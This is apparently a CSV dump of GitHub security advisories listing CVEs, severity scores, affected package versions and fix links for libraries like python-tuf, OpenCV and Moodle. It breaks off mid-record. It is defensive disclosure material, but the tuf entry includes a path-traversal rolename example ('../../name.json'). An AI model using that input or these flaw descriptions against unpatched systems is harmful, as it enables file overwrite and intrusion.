+1.4.0,GHSA-wjw6-2cqr-j4qr,2021-10-19T18:03:49Z,2021-10-19T20:14:36Z,,['CVE-2021-41131'],Client metadata path-traversal,"### Impact +In both clients (`tuf/client` and `tuf/ngclient`), there is a path traversal vulnerability that in the worst case can overwrite files ending in `.json` anywhere on the client system on a call to `get_one_valid_targetinfo()`. It occurs because the rolename is used to form the filename, and may contain path traversal characters (ie `../../name.json`). + +The impact is mitigated by a few facts: +* It only affects implementations that allow arbitrary rolename selection for delegated targets metadata +* The attack requires the ability to A) insert new metadata for the path-traversing role and B) get the role delegated by an existing targets metadata +* The written file content is heavily restricted since it needs to be a valid, signed targets file. The file extension is always .json. + +### Patches +A fix is available in version 0.19 or newer. + +### Workarounds +None that do not require code changes. Clients can restrict the allowed character set for rolenames, or they can store metadata in files named in a way that is not vulnerable: neither of these approaches is possible without modifying python-tuf. + +### References +- [The issue where this was discovered](https://github.com/theupdateframework/python-tuf/issues/1527) +- [Proof of Concept demonstrating the flaw](https://github.com/jku/path-traversal-poc) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [python-tuf](https://github.com/theupdateframework/python-tuf/issues) +* Contact the maintainers by email or Slack +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tuf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41131'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/issues/1527'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102'}, {'type': 'PACKAGE', 'url': 'https://github.com/theupdateframework/python-tuf'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T16:09:34Z', 'nvd_published_at': '2021-10-19T18:15:00Z'}" +1.4.0,GHSA-97x5-cc53-cv4v,2021-10-28T17:21:21Z,2021-10-28T23:14:06Z,,['CVE-2020-22864'],Cross site scripting in froala-editor,A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor allows attackers to execute arbitrary web scripts or HTML.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'froala-editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.0.6'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-22864'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/issues/3880'}, {'type': 'WEB', 'url': 'https://github.com/418sec/wysiwyg-editor/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/pull/3911'}, {'type': 'PACKAGE', 'url': 'https://github.com/froala/wysiwyg-editor'}, {'type': 'WEB', 'url': 'https://github.com/froala/wysiwyg-editor/releases/tag/v4.0.11'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=WE3b1iSnWJY'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T17:21:21Z', 'nvd_published_at': '2021-10-26T22:15:00Z'}" +1.4.0,GHSA-89rj-5ggj-3p9p,2021-11-18T15:29:39Z,2021-10-12T22:03:41Z,,['CVE-2018-5269'],Reachable Assertion in OpenCV.,"In OpenCV 3.3.1 (corresponds with OpenCV-Python 3.3.1.11), an assertion failure happens in cv::RBaseStream::setPos in modules/imgcodecs/src/bitstrm.cpp because of an incorrect integer cast.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-5269'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10540'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10563'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/04/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T19:49:56Z', 'nvd_published_at': '2018-01-08T05:29:00Z'}" +1.4.0,GHSA-c3xq-cj8f-7829,2023-02-13T17:02:33Z,2021-10-12T16:31:43Z,,['CVE-2013-2166'],Inadequate Encryption Strength in python-keystoneclient,python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache encryption bypass.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'python-keystoneclient'}, 'ecosystem_specific': {'affected_functions': ['keystoneclient.middleware.auth_token.AuthProtocol._protect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._unprotect_cache_value', 'keystoneclient.middleware.auth_token.AuthProtocol._get_cache_key', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_get', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_store', 'keystoneclient.middleware.auth_token.AuthProtocol._cache_put', 'keystoneclient.middleware.memcache_crypt.generate_aes_key', 'keystoneclient.middleware.memcache_crypt.compute_mac', 'keystoneclient.middleware.memcache_crypt.hash_data', 'keystoneclient.middleware.memcache_crypt.sign_data', 'keystoneclient.middleware.memcache_crypt.verify_signed_data', 'keystoneclient.middleware.memcache_crypt.encrypt_data', 'keystoneclient.middleware.memcache_crypt.decrypt_data']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.3'}, {'fixed': '0.3.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.2.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-2166'}, {'type': 'WEB', 'url': 'https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2013-2166'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2166'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-2166'}, {'type': 'PACKAGE', 'url': 'https://github.com/openstack/python-keystoneclient'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2013-2166'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html'}, {'type': 'WEB', 'url': 'http://rhn.redhat.com/errata/RHSA-2013-0992.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2013/06/19/5'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/60684'}]","{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:03:40Z', 'nvd_published_at': '2019-12-10T15:15:00Z'}" +1.4.0,GHSA-83rh-hx5x-q9p5,2021-10-07T20:17:07Z,2021-10-12T22:03:23Z,,['CVE-2017-18009'],Out-of-bounds Read in OpenCV,"In OpenCV 3.3.1 (corresponding with OpenCV-Python 3.3.1.11), a heap-based buffer over-read exists in the function cv::HdrDecoder::checkSignature in modules/imgcodecs/src/grfmt_hdr.cpp.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18009'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10479'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10480/commits/4ca89db22dea962690f31c1781bce5937ee91837'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/106945'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:17:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-h9ph-jcgh-gf69,2021-10-19T14:51:30Z,2021-10-12T16:40:28Z,,['CVE-2021-42112'],Cross-site Scripting in Limesurvey,"The ""File upload question"" functionality in LimeSurvey 3.x-LTS through 3.27.18 allows XSS in assets/scripts/modaldialog.js and assets/scripts/uploader.js.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'limesurvey/limesurvey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.27.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42112'}, {'type': 'WEB', 'url': 'https://github.com/LimeSurvey/LimeSurvey/pull/2044'}, {'type': 'WEB', 'url': 'https://github.com/LimeSurvey/LimeSurvey/commit/d56619a50cfd191bbffd0adb660638a5e438070d'}, {'type': 'WEB', 'url': 'https://bugs.limesurvey.org/view.php?id=17562'}, {'type': 'PACKAGE', 'url': 'https://github.com/LimeSurvey/LimeSurvey'}, {'type': 'WEB', 'url': 'https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_limesurvey_-_cve-2021-42112.pdf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T20:21:13Z', 'nvd_published_at': '2021-10-08T21:15:00Z'}" +1.4.0,GHSA-cr3f-r24j-3chw,2023-08-08T19:59:06Z,2021-10-05T17:53:29Z,,['CVE-2021-40325'],Cobbler before 3.3.0 allows authorization bypass for modification of settings.,Cobbler before 3.3.0 allows authorization bypass for modification of settings.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cobbler'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40325'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a'}, {'type': 'PACKAGE', 'url': 'https://github.com/cobbler/cobbler'}, {'type': 'WEB', 'url': 'https://github.com/cobbler/cobbler/releases/tag/v3.3.0'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T16:00:07Z', 'nvd_published_at': '2021-10-04T06:15:00Z'}" +1.4.0,GHSA-fj58-h2fr-3pp2,2023-01-11T21:59:18Z,2021-10-12T16:35:45Z,,['CVE-2019-18413'],SQL Injection and Cross-site Scripting in class-validator,"In TypeStack class-validator, `validate()` input validation can be bypassed because certain internal attributes can be overwritten via a conflicting name. Even though there is an optional `forbidUnknownValues` parameter that can be used to reduce the risk of this bypass, this option is not documented and thus most developers configure input validation in the vulnerable default manner. With this vulnerability, attackers can launch SQL Injection or XSS attacks by injecting arbitrary malicious input. + +The default settings for `forbidUnknownValues` has been changed to `true` in 0.14.0. + +NOTE: a software maintainer agrees with the ""is not documented"" finding but suggests that much of the responsibility for the risk lies in a different product.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'class-validator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-18413'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/1422#issuecomment-1344635415'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/438'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/issues/438#issuecomment-964728471'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator/pull/1798'}, {'type': 'PACKAGE', 'url': 'https://github.com/typestack/class-validator'}, {'type': 'WEB', 'url': 'https://github.com/typestack/class-validator#passing-options'}]","{'cwe_ids': ['CWE-79', 'CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:11:08Z', 'nvd_published_at': '2019-10-24T18:15:00Z'}" +1.4.0,GHSA-wc73-w5r9-x9pc,2021-10-08T22:07:01Z,2021-10-12T16:41:36Z,,['CVE-2020-29204'],Cross-site Scripting in XXL-JOB,XXL-JOB 2.2.0 allows Stored XSS (in Add User) to bypass the 20-character limit via xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.xuxueli:xxl-job-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29204'}, {'type': 'WEB', 'url': 'https://github.com/xuxueli/xxl-job/issues/2083'}, {'type': 'WEB', 'url': 'https://github.com/xuxueli/xxl-job/commit/227628567354d3c156951009d683c6fec3006e0e'}, {'type': 'PACKAGE', 'url': 'https://github.com/xuxueli/xxl-job'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:07:01Z', 'nvd_published_at': '2020-12-27T06:15:00Z'}" +1.4.0,GHSA-jvjp-vh27-r9h5,2021-10-27T17:07:08Z,2021-10-27T18:53:03Z,,['CVE-2021-25977'],Cross-site Scripting in PiranhaCMS,"In PiranhaCMS, versions 7.0.0 to 9.1.1 are vulnerable to stored XSS due to the page title improperly sanitized. By creating a page with a specially crafted page title, a low privileged user can trigger arbitrary JavaScript execution. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Piranha'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '9.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25977'}, {'type': 'WEB', 'url': 'https://github.com/PiranhaCMS/piranha.core/commit/543bc53c7dbd28c793ec960b57fb0e716c6b18d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/PiranhaCMS/piranha.core'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25977'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:55:07Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}" +1.4.0,GHSA-7vxr-6cxg-j3x8,2021-10-07T18:59:04Z,2021-10-12T22:33:59Z,,['CVE-2013-2512'],OS Command Injection in ftpd,The ftpd gem 0.2.1 for Ruby allows remote attackers to execute arbitrary OS commands via shell metacharacters in a LIST or NLST command argument within FTP protocol traffic.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'ftpd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-2512'}, {'type': 'WEB', 'url': 'https://github.com/wconrad/ftpd/commit/828064f1a0ab69b2642c59cab8292a67bb44182c'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ftpd/CVE-2013-2512.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/wconrad/ftpd'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20210206231123/http://vapidlabs.com/advisory.php?v=34'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T18:59:04Z', 'nvd_published_at': '2021-01-26T23:15:00Z'}" +1.4.0,GHSA-mcwm-2wmc-6hv4,2021-10-06T00:23:01Z,2021-10-06T00:23:01Z,2021-10-06T00:23:01Z,['CVE-2021-31957'],ASP.NET Core Denial of Service Vulnerability,"# Withdrawn + +This advisory was initially published and mapped incorrectly to nuget `Microsoft.NETCore.App.Ref`. We later reanalyzed this advisory and found it does not have a direct mapping to a NuGet package. Thus we have withdrawn this advisory. + +The underlying ASP.NET Core Denial of Service Vulnerability and CVE-2021-31957 remain legitimate. + +# Description. + +Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. + +A denial of service vulnerability exists when ASP.NET Core improperly handles client disconnect. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. + + +### Patches + +* If you're using .NET 5.0, you should download and install Runtime 5.0.7 or SDK 5.0.204 (for Visual Studio 2019 v16.8) or SDK 5.0.301 (for Visual Studio 2019 16.10) from https://dotnet.microsoft.com/download/dotnet-core/5.0. + +* If you're using .NET Core 3.1, you should download and install Runtime 3.1.16 or SDK 3.1.116 (for Visual Studio 2019 v16.4) or 3.1.410 (for Visual Studio 2019 v16.5 or later) from https://dotnet.microsoft.com/download/dotnet-core/3.1. + + + +#### Other Details + +- Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/188 +- An Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/33369 +- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31957 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Ref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.16'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Ref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-mcwm-2wmc-6hv4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31957'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4PRVVLXXQEF4SEJOBV3VRJHGX7YHY2CG/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CVCDYIP4A6DDRT7G6P3ZW6PKNK2DNWJ2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PMHWHRRYDHKM6BIINW5V7OCSW4SDWB4W/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VMAO4NG2OQ4PCXUQWMNSCMYWLIJJY6UY/'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31957'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T19:41:18Z', 'nvd_published_at': '2021-06-08T23:15:00Z'}" +1.4.0,GHSA-v6w3-2prq-h95f,2021-10-06T13:31:54Z,2021-10-06T17:48:38Z,,['CVE-2021-28170'],Improper Input Validation in Jakarta Expression Language,"In the Jakarta Expression Language implementation 3.0.3 and earlier, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.sun.el:el-ri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28170'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/el-ri/issues/155'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/el-ri/pull/160/commits/b6a3943ac5fba71cbc6719f092e319caa747855b'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-ee4j/el-ri'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-20', 'CWE-917'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:31:54Z', 'nvd_published_at': '2021-05-26T22:15:00Z'}" +1.4.0,GHSA-m8wh-mqgf-rr8g,2021-10-12T16:59:26Z,2021-10-12T17:50:25Z,,['CVE-2021-25738'],Code injection in Kubernetes Java Client,Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.kubernetes:client-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25738'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes-client/java/issues/1698'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes-client/java'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/08/23/2'}]","{'cwe_ids': ['CWE-20', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:59:26Z', 'nvd_published_at': '2021-10-11T19:15:00Z'}" +1.4.0,GHSA-c7v4-m269-4995,2021-10-20T16:46:12Z,2021-10-21T17:49:08Z,,['CVE-2020-25703'],Exposure of Sensitive Information to an Unauthorized Actor in Moodle,"The participants table download in Moodle always included user emails, but should have only done so when users' emails are not hidden. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5 and 3.7 to 3.7.8. This is fixed in moodle 3.9.3, 3.8.6, 3.7.9, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25703'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895439'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413941'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:46:12Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}" +1.4.0,GHSA-pvh2-pj76-4m96,2021-10-25T20:07:57Z,2021-10-19T15:28:35Z,,['CVE-2021-41153'],Specification non-compliance in JUMPI,"### Impact + +In `evm` crate `< 0.31.0`, `JUMPI` opcode's condition is checked after the destination validity check. However, according to Geth and OpenEthereum, the condition check should happen before the destination validity check. + +### Patches + +This is a **high** severity security advisory if you use `evm` crate for Ethereum mainnet. In this case, you should update your library dependency immediately to on or after `0.31.0`. + +This is a **low** severity security advisory if you use `evm` crate in Frontier or in a standalone blockchain, because there's no security exploit possible with this advisory. It is **not** recommended to update to on or after `0.31.0` until all the normal chain upgrade preparations have been done. If you use Frontier or other `pallet-evm` based Substrate blockchain, please ensure to update your `spec_version` before updating this. For other blockchains, please make sure to follow a hard-fork process before you update this. + +### Workarounds + +If you are dependent on an older version of `evm` and cannot update due to API interface changes, please contact Wei by email (wei@that.world), who will be happy to help you to publish patch releases for older `evm` versions. + +### References + +Fix PR: https://github.com/rust-blockchain/evm/pull/67 + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in the `evm` repo. + +### Special thanks + +Special thanks to @rakita for reporting this issue. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'evm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-blockchain/evm/security/advisories/GHSA-pvh2-pj76-4m96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41153'}, {'type': 'WEB', 'url': 'https://github.com/rust-blockchain/evm/pull/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-blockchain/evm'}]","{'cwe_ids': ['CWE-670'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-18T21:06:02Z', 'nvd_published_at': '2021-10-18T21:15:00Z'}" +1.4.0,GHSA-j23j-q57m-63v3,2021-10-13T17:39:25Z,2021-10-13T18:54:50Z,,[],Denial of service in DataCommunicator class in Vaadin 8,Missing check in `DataCommunicator` class in `com.vaadin:vaadin-server` versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.14.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-j23j-q57m-63v3'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12415'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33609'}]","{'cwe_ids': ['CWE-400'], 'severity': 